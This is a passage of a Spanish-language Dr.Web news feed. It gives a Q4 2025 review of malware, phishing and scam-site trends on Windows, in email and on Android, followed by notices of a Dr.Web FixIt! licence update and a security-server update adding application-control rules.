        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Las amenazas más populares del IV trimestre del año 2025&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un troyano creado en lenguaje de programación Go y destinado para cargar varios miners y adware en el sistema objetivo. El malware es un archivo DLL y está en &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Para su inicio explota la vulnerabilidad de la clase DLL Search Order Hijacking en el cliente Torrent, uTorrent.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware que sirve de instalador intermediario de software pirata.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un script malicioso que en un ciclo infinito busca ventanas con texto &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; y &lt;span class="string"&gt;розробника&lt;/span&gt; y les envía un evento de pulsar el botón Escape, al cerrarlas de forma forzosa.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4268&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección del componente malicioso de la extensión de navegador WinSafe. Este componente es un script de JavaScript que visualiza publicidad importuna en navegadores. &lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Siggen.33379&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un bloqueador de publicidad de falso navegador Adblok Plus que se instala en el sistema por otro malware para visualizar publicidad.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Estadísticas de malware en el tráfico de correo&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Las amenazas más populares en el tráfico de correo del IV trimestre del año 2025 &lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Una familia de troyanos descargadores que usan vulnerabilidades de documentos Microsoft Office. Sirven para descargar otro malware en el equipo atacado.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Expolits para usar las vulnerabilidades en el software Microsoft Office que permiten ejecutar un código aleatorio. &lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de la versión comprimida del programa troyano &lt;a href="https://vms.dr-web.es/search/?q=Trojan.AutoIt.289&amp;lng=es"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;, creado en lenguaje script AutoIt. Se difunde como parte del grupo de malware de varios tipos: un miner, un backdoor y un módulo de autopropagación. &lt;a href="https://vms.dr-web.es/search/?q=Trojan.AutoIt.289&amp;lng=es"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; realiza varias acciones maliciosas que dificultan la detección de la carga útil básica.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.791&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un script malicioso en lenguaje JavaScript que genera una página web phishing.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Cifradores&lt;/h3&gt;

&lt;p&gt;En el IV trimestre del año 2025 el número de solicitudes para descifrar los archivos afectados por los programas troyanos cifradores aumentó un 1,15% comparado con el III trimestre.&lt;/p&gt;

&lt;p&gt;Dinámica de recepción de solicitudes para descifrar al Servicio de soporte técnico de Doctor Web:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Los encoders más populares del IV trimestre del año 2025&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24,90% solicitudes de usuarios&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 4,21% solicitudes de usuarios&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.Encoder.29750&amp;lng=es"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3,42% solicitudes de usuarios&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.Encoder.26996&amp;lng=es"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2,68% solicitudes de usuarios&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356 &lt;/b&gt; — 0,38% solicitudes de usuarios&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Estafas en la red&lt;/h3&gt;

&lt;p&gt;Durante el cuarto trimestre de 2025, los analistas de Internet de &lt;b&gt;Doctor Web&lt;/b&gt; detectaron la aparición de nuevos sitios web falsos de marketplaces. Los estafadores, supuestamente en nombre de plataformas comerciales, ofrecen a las posibles víctimas participar en un juego de tipo «carrusel» (similar a la ruleta) con la posibilidad de ganar un premio. Tras varios intentos, al usuario «le toca la suerte», pero para recibir el premio se le exige primero el pago del envío y, posteriormente, del seguro, de impuestos, etc.&lt;br /&gt;En algunos casos, a la víctima se le informa de que el producto deseado no está disponible y se le propone canjearlo por dinero. Sin embargo, para recibirlo es necesario pagar una supuesta «tasa». Si el usuario acepta, se le vuelven a exigir pagos adicionales en concepto de seguro, activación de una supuesta cuenta, entre otros.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de un sitio web falso de Marketplace que propone “sortear los premios”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;También se añadieron a la base de sitios no recomendados y maliciosos los nuevos recursos de Internet donde los estafadores venden entradas de teatro inexistentes. En estos sitios se ofrece asistir a funciones teatrales, incluso a precios atractivos. Sin embargo, tras realizar el pago, las víctimas no reciben las entradas deseadas y, en la práctica, entregan su dinero a los delincuentes. &lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web fraudulento de venta de entradas al teatro no existentes&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;También se detectaron otros recursos que imitan los sitios web de cines privados y proponen adquirir entradas para ver películas. Como resultado, las víctimas no reciben ninguna entrada una vez realizada la compra en estas plataformas.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web falso de un cine privado&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nuestros expertos detectaron una serie de recursos de phishing, entre los cuales había sitios web falsos del servicio Steam. Con su ayuda, los atacantes intentaban obtener los datos de las cuentas de los usuarios, invitándolos a introducir su nombre de usuario y contraseña para la autenticación.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web phishing que imita un portal de Internet real Steam y propone a la víctima potencial entrar en su cuenta &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Además, los estafadores otra vez atrajeron a las víctimas potenciales a proyectos de inversión no existentes. Uno de los sitios web detectados proponía a los usuarios de habla rusa en EE.UU. invertir 250$ en un proyecto llamado Federal Invest y «ganar hasta 90 000 USD en tres meses». Este proyecto supuestamente fue creado así mismo con participación de Donald Trump.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web fraudulento que propone participar en un «proyecto de inversión ventajoso»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Otro sitio informó de que los usuarios uzbekos podían recibir hasta 15 000 000 de sumes uzbekos ya en el primer mes tras unirse al proyecto promocionado, que supuestamente estaba relacionado con un gran holding.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web fraudulento que prometía a los residentes de Uzbekistán muchas ganancias en caso de participar en un «proyecto de inversión»&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/"&gt;Conozca más sobre los sitios web no recomendados por Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Malware y software no deseado para dispositivos móviles&lt;/h3&gt;

&lt;p&gt;Según los datos estadísticos de detecciones de Dr.Web Security Space para dispositivos móviles, en el IV trimestre del año 2025 las amenazas más populares en Android, a pesar de la actividad más baja, otra vez fueron los troyanos de publicidad &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Al tercer lugar subieron los representantes de malware de la familia &lt;b&gt;Android.Siggen&lt;/b&gt;, que tiene varias funcionalidades. Durante los últimos 3 meses subió la actividad de troyanos bancarios, así mismo, el mayor crecimiento entre los mismos lo confirmaron los representantes de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;El software no deseado más popular fueron los programas &lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;, modificados a través del servicio en la nube CloudInject. Entre software potencialmente peligroso la mayor actividad se observaba por parte de las aplicaciones &lt;b&gt;Tool.NPMod&lt;/b&gt;, modificadas con la herramienta NP Manager. Los representantes de adware más popular fueron los módulos &lt;a href="https://vms.dr-web.es/search/?q=Adware.Adpush&amp;lng=es"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; que los desarrolladores implementan en software en Android.&lt;/p&gt;

&lt;p&gt;En octubre la empresa Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15076" target="_blank"&gt;publicó&lt;/a&gt; la información sobre un backdoor peligroso &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; implementado por los malintencionados en las modificaciones del Messenger Telegram X. El malware roba la información privada y permite administrar la cuenta de la víctima, así como controlar directamente el Messenger al modificar su lógica de funcionamiento.&lt;/p&gt;

&lt;p&gt;Durante el IV trimestre nuestros analistas de virus detectaron en el catálogo Google Play más amenazas, entre las cuales hubo troyanos &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; que suscriben a usuarios a servicios de pago, y también malware usado para objetivos fraudulentos &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Los eventos más detectados vinculados a la seguridad “móvil” en el IV trimestre&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Los troyanos de publicidad siguieron siendo las amenazas más populares para dispositivos en Android&lt;/li&gt;
    &lt;li&gt;Aumentó la actividad de troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;En modificaciones terceras del messenger Telegram X fue detectado un backdoor peligroso &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;En el catálogo Google Play apareció nuevo malware&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Para más información sobre los eventos de virus para dispositivos móviles en el IV trimestre del año 2025, consulte nuestro &lt;a href="https://news.dr-web.es/show/?i=15101" target="_blank"&gt;informе&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15095&amp;lng=es</guid><title>Actualizado el acuerdo de licencia del producto Dr.Web FixIt!</title><link>https://news.dr-web.es/show/?i=15095&amp;lng=es&amp;c=5</link><pubDate>Mon, 29 Dec 2025 14:25:38 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Hemos actualizado el acuerdo de licencia del producto Dr.Web FixIt!. Puede consultar el documento en el siguiente enlace: &lt;a href="https://license.drweb.com/agreement"&gt;https://license.drweb.com/agreement&lt;/a&gt;&amp;nbsp;&lt;/newslead&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! es necesario para realizar un análisis detallado de seguridad en estaciones de trabajo y servidores con sistema operativo Windows, así como para eliminar las amenazas de virus detectadas y las vulnerabilidades potenciales. Su principal ventaja radica en la capacidad de detectar malware de última generación y programas utilizados en ataques dirigidos que no son identificados por otras herramientas de ciberseguridad.&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! está dirigido principalmente a expertos encargados de la supervisión de la seguridad de la infraestructura informática y del análisis de ciberincidentes. Sin embargo, incluso si la empresa no dispone de un equipo SOC especializado, esta solución puede tanto diagnosticar amenazas en una estación de trabajo como desinfectarla una vez detectadas.&lt;br&gt;Si es necesario, los expertos de Doctor Web pueden analizar la información obtenida mediante Dr.Web FixIt!. Para ello, es preciso adquirir un certificado de seguimiento experto de la tarea.&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;La solución está disponible a través de los &lt;a href="https://partners.dr-web.es/find_partner/?lng=es"&gt;socios&lt;/a&gt; de Doctor Web.&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15094&amp;lng=es</guid><title>Actualización importante del servidor de control centralizado para Dr.Web Enterprise Security Suite y Dr.Web Industrial</title><link>https://news.dr-web.es/show/?i=15094&amp;lng=es&amp;c=5</link><pubDate>Fri, 12 Dec 2025 11:27:10 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;La empresa Doctor Web lanza una actualización importante para el servidor en Dr.Web Enterprise Security Suite y Dr.Web Industrial 13.0.1.202511120. Estará disponible para la descarga a partir del 15 de diciembre de 2025. El cambio clave es la ampliación de la funcionalidad del componente «Control de aplicaciones», lo cual ayudará a mejorar bastante la protección de usuarios.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;En el paquete de actualizaciones hemos añadido la nueva funcionalidad y mejoras. En particular, para los usuarios de la línea de productos de Dr.Web Enterprise Security Suite y Dr.Web Industrial fue ampliada la lista de criterios del análisis funcional:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;En la categoría «Inicio de aplicaciones» aparecieron prohibiciones para iniciar los procesos subordinados por los programas de oficina y clientes de correo. Esto reduce el riesgo de infección a través de los documentos maliciosos y mensajes, sin afectar al trabajo ordinario de usuarios.&lt;/li&gt;&lt;li&gt;En la categoría «Inicio de interpretadores de script» han sido añadidas las nuevas reglas que permiten bloquear el inicio de scripts de aplicaciones de oficina y clientes de correo y restringir la ejecución de scripts AutoIt, así como Java y Python. Estas restricciones protegen contra el uso indebido de interpretadores usados con frecuencia en caso de ciberataques, así como en caso de ejecución de automatizaciones no deseadas.&lt;/li&gt;&lt;li&gt;En la categoría «Carga de controladores» se ha incluido una prohibición para instalar los controladores sin firma WHQL, lo cual ayuda a prevenir el uso de los módulos no firmados y la carga del código potencialmente peligroso al núcleo del sistema.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;El conjunto de reglas actualizado les proporciona a los administradores de los medios de protección las herramientas más flexibles para prevenir la actividad maliciosa y mejorar la resistencia de la infraestructura frente a las amenazas modernas.&lt;br&gt;Así mismo, hemos corregido algunos problemas anteriormente detectados. Entre los mismos:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Se ha corregido un error que pudo surgir al actualizar el software del Servidor Dr.Web con Windows SO en condiciones de recursos de computación limitados;&lt;/li&gt;&lt;li&gt;Se ha corregido un error por el que, en caso de seleccionar la configuración «Actualizar solo las bases» en la sección del Centro de Control «Restricciones de actualizaciones» no se actualizaba el producto del repositorio «Bases de filtros de contenido para UNIX»;&lt;/li&gt;&lt;li&gt;Se ha corregido la lógica de actualización de la caché de respuestas del servidor DNS.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Para el listado detallado de correcciones, véase este &lt;a href="https://f2.drweb.com/get+meta+file/?k=4f637d7902fe78c8169021c2e3dcf8d4&amp;amp;sdl=en&amp;amp;sdf=t"&gt;documento&lt;/a&gt;.&amp;nbsp;&lt;/p&gt;</description></item></channel></rss>
